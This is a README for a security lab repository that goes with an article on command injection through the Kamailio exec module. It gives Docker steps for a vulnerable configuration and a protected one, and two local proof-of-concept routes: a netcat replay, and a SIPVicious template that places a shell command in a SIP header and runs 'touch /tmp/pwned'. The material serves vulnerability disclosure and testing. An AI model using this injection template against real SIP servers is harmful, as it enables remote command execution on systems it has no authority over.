This repository includes examples referenced from https://www.rtcsec.com/article/kamailio-exec-module-considered-harmful.
Note: depending on your Docker setup, you might need to use the command docker compose instead of docker-compose.
To run the vulnerable version of the Kamailio configuration:
docker-compose run kamailio-vulnerableTo run the protected version:
docker-compose run kamailio-protectedWe give two examples for exploitation, one making use of netcat and the other uses SIPVicious PRO which is commercially available.
-
Start monitoring the
/tmpdirectory:docker-compose exec kamailio-vulnerable watch ls -alh /tmp -
To run the PoC use the following instruction:
cat poc.txt | nc 127.0.0.1 5060 -
Observe the result in the directory listing
When making use of the stable version of SIPVicious PRO, one may use the repeater tool to reproduce this issue as follows:
-
Save the following template as
inviterequest.tpl(or switch to thesvprodirectory in this repository):INVITE sip:`$SIP_HF_COMMAND`@127.0.0.1 SIP/2.0 Command: {{ ENV "COMMAND" }} Via: SIP/2.0/{{.AddrFamily}} {{.LocalAddr}};rport;branch=z9hG4bK-{{.Branch}} Max-Forwards: 70 From: {{.FromVal}} To: {{.ToVal}} Call-ID: {{.CallID}} CSeq: {{.CSeq}} INVITE Contact: {{.ContactVal}} Content-Length: {{.Body | len}} Content-Type: application/sdp {{.Body -}} -
Start monitoring the
/tmpdirectory:docker-compose exec kamailio-vulnerable watch ls -alh /tmp -
Run the PoC as follows:
COMMAND="touch /tmp/pwned" sipvicious sip utils repeater udp://127.0.0.1:5060 -m invite -
Observe the result in the directory listing
One may also make use of a new experimental tool called iterator which can act like a scanner or fuzzer to identify this vulnerability semi-automatically.
The image is already available on the Docker registry. If you would like to build it, you may do so as follows:
docker-compose build